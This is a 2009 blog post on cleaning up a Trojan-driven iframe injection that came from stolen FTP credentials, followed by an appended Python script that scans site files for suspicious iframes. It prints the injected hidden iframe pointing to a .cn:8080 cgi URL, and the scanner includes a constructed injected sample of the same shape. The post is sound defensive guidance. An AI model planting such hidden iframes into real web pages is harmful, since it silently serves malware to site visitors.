Thursday, 9 July 2009

How to solve an iframe injection caused by Trojan malware


What is IFRAME?

The iframe tag defines an inline frame that contains another document. The iframe tag is used to embed another document inside a website's page.

For example, I use the following iframe code to insert Salesforce.com syndicated content inside my website. Please refer to the image below.

<iframe id="blockrandom"
        name="iframe"
        src="http://probyte2u.com/salesforce.html"
        width="100%"
        height="1300"
        scrolling="auto"
        align="top"
        frameborder="0"
        class="wrapper">
    This option will not work correctly. Unfortunately, your browser does not support inline frames.
</iframe>

Now you should have a rough idea of what an IFRAME is and how it is used.

Now, what does IFRAME injection mean?

Iframe injection means that attackers insert their own iframe code into the pages of your website. They use Trojan malware to do it.

Normally they will target your index.html, index.php, default.php or configuration.php pages.

They insert their code into your website, so that when visitors view the page, the malicious content is downloaded to the visitor's computer, where it can replicate the process and harvest the visitor's financial and identity details.

Their main purpose is financial gain, though some do it for political reasons. They can also infect a large number of PCs and use them to launch a Distributed Denial of Service (DDoS) attack against their target.

From my own personal experience, I first encountered this problem when I tried to access my website and got the following error.

Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85

So I checked the index.php file and found the following code inserted in it.

The iframe injection was not done properly: the additional "/" symbol at the start of the injected code, shown below, caused the parse error, so the page was broken instead of silently serving the malicious content to visitors.

/
<iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden">

If the iframe injection had been done properly, most visitors to the infected site would probably have been infected with malware.

A sample of the Mozilla warning for a Reported Attack Site is shown below.


So what I did was remove the iframe injection from the infected file and upload the cleaned files. I also changed the FTP details for the website.

My site was safe for a few days, but unfortunately the same problem occurred after a while. I was suspicious about how the hacker was able to access my website.

So I checked with my hosting provider to find out how my website had been hacked.

Only then did I learn that my personal computer was most probably infected by a Trojan, and that the hacker had automated the whole process.

The Trojan managed to steal the usernames and passwords of all my websites that were saved in the file transfer protocol (FTP) software I used. Every website I had accessed with that FTP software was infected with the iframe injection.

Luckily, I had backup files for my website that were not infected.

Since a lot of the files had been infected, I had no other choice but to restore the entire site from the backup. I also changed my FTP username and password.

To prevent the problem from recurring I installed Kaspersky Internet Security, and there have been no more iframe injection problems since.

The root cause of my problem was that my antivirus (free version) couldn't detect the Trojan at all.

If your problem is not as serious as mine, you can resolve it using the steps below.

How to eliminate this problem

Use the paid version of Kaspersky Antivirus, update the virus definitions and scan your computer. Clean all infected files on your computer.

How to clean the infected php or html pages in my web site?

1. Refer to the Google badware notice, like this one:


Approximately 6 files have been injected. You can search your index.php and index.html for the injected lines of code.

You can also download a copy of your public_html if there are too many injected files (zip the whole public_html, or zip it folder by folder). Uncompress the zip file on your desktop. Kaspersky will notify you of the injected files. Do not let it clean the files; just save the log file so you can edit them manually. Using this method, your pages will not be destroyed or altered by Kaspersky.

2. Change your FTP/cPanel login information. Avoid using the same password for web registrations; your FTP password should not be reused anywhere else. Some fake websites harvest this information and perform iframe injections across the web.

3. Sort your files by date in the FTP window. Check the most recently edited pages (around the infection date) for injected code.

4. You can revert to a public_html backup. This method is not advisable and should be used only as a last resort if you cannot find the infected pages. If your pages have been infected for more than a month, your backup files most probably also contain the injected code.

5. Also, remember not to save your website's username and password inside your FTP software. From my own experience, the Trojan managed to steal that information from the FTP software.
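Steps 1 and 3 above amount to searching a downloaded copy of public_html for injected iframe tags and checking recently edited pages. The following Python script is an added example, not code from the original post: it walks a directory, flags iframe tags whose src points at a host you do not trust, that are hidden via CSS, or that are only a few pixels in size, and reports file and line number so you can edit the pages by hand (it never modifies them). The trusted host name, the sample page contents and the injected host name are constructed for the example.

```python
"""Scan a downloaded copy of a site's public_html for injected iframes.

Added example, not code from the original post: it reports suspicious
<iframe> tags with file and line number so the pages can be fixed by hand,
as the post recommends, and never edits the files it scans. The host names
and sample pages below are constructed.
"""
from __future__ import annotations

import os
import re
import tempfile
from datetime import datetime

SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js"}  # page types the post names as targets
TRUSTED_HOSTS = {"probyte2u.com"}  # hosts your own pages legitimately embed (assumed)

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SIZE_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)


def classify_iframe(attrs: str, trusted_hosts: set[str]) -> list[str]:
    """Reasons an iframe's attributes look injected; an empty list means it looks fine."""
    reasons = []
    m = SRC_RE.search(attrs)
    src = m.group(1) if m else ""
    # Host part of the src (scheme, port and path stripped); empty for relative URLs.
    host = re.sub(r"^https?://", "", src, flags=re.IGNORECASE).split("/")[0].split(":")[0].lower()
    if host and host not in trusted_hosts:
        reasons.append(f"external src host {host!r}")
    if HIDDEN_RE.search(attrs):
        reasons.append("hidden via CSS")
    sizes = [int(v) for _, v in SIZE_RE.findall(attrs)]
    if sizes and max(sizes) <= 10:
        reasons.append("tiny frame")
    return reasons


def scan_text(text: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> list[tuple[int, str]]:
    """Suspicious iframes in one page's text, as (line number, reason) pairs."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        reasons = classify_iframe(m.group(1), trusted_hosts)
        if reasons:
            line_no = text.count("\n", 0, m.start()) + 1
            hits.append((line_no, "; ".join(reasons)))
    return hits


def scan_tree(root: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> dict[str, list[tuple[int, str]]]:
    """Scan every page under root read-only; returns {relative path: hits}."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read(), trusted_hosts)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def modified_since(root: str, since: datetime) -> list[str]:
    """Files under root changed after `since` (the post's step 3: sort by date)."""
    cutoff = since.timestamp()
    return sorted(
        os.path.relpath(os.path.join(d, n), root)
        for d, _, names in os.walk(root)
        for n in names
        if os.path.getmtime(os.path.join(d, n)) > cutoff
    )


# Constructed sample pages: one carrying an injection shaped like the post's, one clean.
INJECTED_INDEX = (
    "<?php\n// site header\n?>\n<html><body>\n<h1>Welcome</h1>\n"
    '<iframe src="http://injected-host.example:8080/ts/in.cgi?id" '
    'width=125 height=125 style="visibility: hidden"></iframe>\n'
    "</body></html>\n"
)
CLEAN_EMBED = (
    '<iframe id="blockrandom" src="http://probyte2u.com/salesforce.html" '
    'width="100%" height="1300" frameborder="0"></iframe>\n'
)


def demo() -> dict[str, list[tuple[int, str]]]:
    """Write the constructed sample site to a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="iframe-scan-")
    os.makedirs(os.path.join(root, "pages"))
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(INJECTED_INDEX)
    with open(os.path.join(root, "pages", "salesforce.html"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_EMBED)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for line_no, reason in hits:
            print(f"{path}:{line_no}: {reason}")
```

Point `scan_tree` at the unzipped copy of public_html on your desktop and put your own domain in TRUSTED_HOSTS; an iframe that is both hidden and loads from a host you never embed is the pattern shown in the post. Because the script only reports, you keep control of what is removed from each page, which is the same reason the post says not to let the antivirus clean the files itself.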
